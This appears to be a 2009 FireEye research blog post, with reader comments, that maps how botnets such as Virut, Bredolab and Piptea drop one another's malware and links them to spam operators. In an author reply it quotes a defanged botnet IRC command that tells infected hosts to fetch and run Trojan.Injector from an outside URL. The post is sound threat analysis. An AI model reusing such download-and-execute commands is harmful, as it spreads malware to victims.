BotnetWeb: Readers may not be familiar with this term, as I coined it recently. I define it as the following:
"A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s)"
This type of relationship among different malware is not something new. We have already seen similar relationships among the top spam Botnets like Pushdo, Srizbi, Cutwail, Mega-D/Ozdok, and Rustock.
For a quick recap readers may reference these articles:
http://blog.fireeye.com/research/2008/08/srizbi-and-rust.html
http://blog.fireeye.com/research/2008/08/srizbi-and-ru-1.html
http://blog.fireeye.com/research/2008/09/new-axis-of-evi.html
In this article I will talk about some of the most popular and widespread malware we've seen recently, and their relationship with each other.
I define this relationship as:
If malware 'A' is a direct download of Malware 'B' , I call it a parent-child working relationship and assume that either both of these malware samples are being run by the same group or they have a 'pay per install' relationship.
I'll try to show this parent-child/grandchild relationship in the form of different graphs. In the end I will try to connect these graphs with each other based on common nodes, if any (in this case each node represents a different malware family). I'll continue by connecting these graphs with each other, and at the end there will be a very interesting and telling picture painted.
Enough on the background; let's start talking about BotnetWeb now.
Note: In this article each BotnetWeb will be named based on the top most malware node.
1. Virut
Here are different samples of malware which I have seen so far to be part of the 'Virut' BotnetWeb.
Trojan.Injector, Pushdo/Cutwail, Grum, Xarvestor, Waledac, Basin, Piptea, Sality, Zbot, Tofsee, Rogue AVs (such as ProAntiSpyware2009, AntivirusXP2008, AntiSpywareProXp, and WinSpywareProtect etc), NsAnti, Spammer.MyDoom, Keyloggers, ErtFor, Monder and Vundo.
This is how it looks in the form of a parent-child relationship graph:
The above graph shows that if you are unlucky enough to become infected with Virut, within minutes you'll find yourself infected with everything else listed on
this graph. Cleaning up any one, or even many of these infections will
be meaningless to your overall security with the others still in place.
2. BredoLab
The second such BotnetWeb is 'Bredolab'. These are some of the malware families I've seen associated with it so far:
Finanz, Cutwail, Grum, Katusha, Trojan-GameThief.Win32.Magania, MS Antispyware 2009 (Rogue), and KeyStart.
The graph for Bredolab looks like this:
3. Piptea
The third BotnetWeb I want to talk about is 'Piptea'. These are some of the participating malware families:
ErtFor, Zlob, Vundo, Finanz, Zbot, Rustock, Monder, Mega-D/Ozdok, Spyware.hiliti, SpyProtector(Rogue) and Trojan.Tdss
Here is the graph for Piptea:
4. Trojan.Exchanger
The fourth such BotnetWeb is 'Exchanger'. We have talked a lot about Exchanger in the past, prior to the McColo shutdown.
These are some malware families which we found to be part of Exchanger:
Srizbi, Rustock, Mega-D/Ozdok, Pushdo , Cutwail and Antipyware-Xp2008 (Rogue)
It's very interesting to see that there are many common nodes amongst the above graphs. Based on these common nodes we can connect all these graphs as follows:
This end graph paints a very scary picture. With this type of multi-layered deployment, it becomes almost impossible to shut down a particular participant. Unless the top level nodes (generic downloaders) are stopped, they will keep on dropping new or updated malware installs. I'm pretty sure that this is what happened after the McColo shutdown. After the initial failed attempt to regain control over their lost botnets like Srizbi, botherders stopped supporting Srizbi, and simply replaced those bots using top nodes with others like Xarvester, Cutwail, and Grum. This shift from Srizbi to Xarvester was also explained in one of my earlier posts.
Here are some traffic snippets showing the order of these downloads:
Now lets talk how big these threats are. Most of the readers of this blog are already familiar with the top spam Botnets like Pushdo, Rustock, Xarvester, Srizbi, Cutwail, Mega-D/Ozdok, Waledac and their estimated sizes together being in the millions. Members of the AV industry have talked at length about how incredibly widespread malware like Virut, Bredolab, Vundo, Zbot, Piptea, and RogueAV(s) have become. A recent survey conducted by me, based on statistics collected from our FIreEye Malware Analysis and Exchange (MAX) Network, has shown that more than 45% percent of the malware we have recently encountered in the field belongs to the above mentioned BotnetWebs.
But who are the group(s) running all these BotnetWebs? Most of the common nodes in the above graphs are big SPAM Botnets, which we already suspect are being run by the Russian Business Network. Recently, I found some strong connections between the spam Botnets and some front-end guys selling SPAM in Russia as a serious business.
http://blog.fireeye.com/research/2009/02/into-the-srizbis-business-model.html
http://blog.fireeye.com/research/2009/03/alexander-s-kopylov.html
This is not the end. Right after the publication of these articles I found most of these SPAM selling web sites to be dead for some time. Around the 23rd of March I saw these web sites coming on-line again. The interesting thing was that all of these SPAM selling web sites were hosted on the same server (58.65.237.153) owned by HOSTFRESH in Hong Kong. A reverse IP lookup revealed 65 web sites being hosted on the same server.
Most of these domains were SPAM selling web sites owned by Alexender S Kopylov.
A quick search on IP (58.65.237.153) revealed that this server is a known CnC for 'Zbot' which is already known to be associated with the RBN. Alex recently blogged about Hostfresh, and they were subsequently dropped from the Internet routing tables. We received no notification, but one has to assume that his post helped shine some light on that dark corner of the Internet.
http://www.google.com/search?hl=en&q=58.65.237.153&btnG=Google+Search&aq=f&oq=
http://www.google.com/search?hl=en&q=58.65.237.153+zbot&btnG=Search
We all know how big this malware problem has become in recent times. These pieces of malware when considered individually are threats which can damage a computer system in a variety of ways, but collectively when they take the form of Botnets, and now Botnetwebs, under the control of a few criminal groups, they paint a very scary picture. We need to remember that in the past, these Bot armies have been used to launch cyber attacks against major infrastructures like we saw with Estonia and Georgia.
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM
Thanks Thorsten,
..for raising a very good point. I am certainly aware of such cases and try not to include such cases while explaining relationships between Virut and other malware.
As you can see from the Virut graph, Virut has be seen downloading Trojan.Injector and all other malware are further downloaded by Injector not by Virut.
It normally happens like this...
1. Virut's IRC component executes and takes Injector download link from the cnc as:
:u. PRIVMSG zybjtfay :!get hxxp://goasi.cn/ex/a.php
hxxp://goasi.cn/ex/a.php , points to a binary which is Trojan.Injector and then all other sub downloads are done by Injector.
I hope I am able to clear my point here. If there is still more information required from my side, feel free to email us at :
research A-T fireeye d-o-t c-o-m
Posted by: Atif Mushtaq | 2009.04.28 at 10:33 AM
Thanks a lot for the interesting article! I have a quick comment regarding Virut: this malware is a file infector with an IRC component and not a classical bot. We quite often see other malware being infected with Virut, which often leads to a confusion regarding Virut in general. Could it be that your "Virut BotnetWeb" contains many artifacts which depend on which kind of malware is infected with Virut?
Posted by: Thorsten Holz | 2009.04.28 at 03:26 AM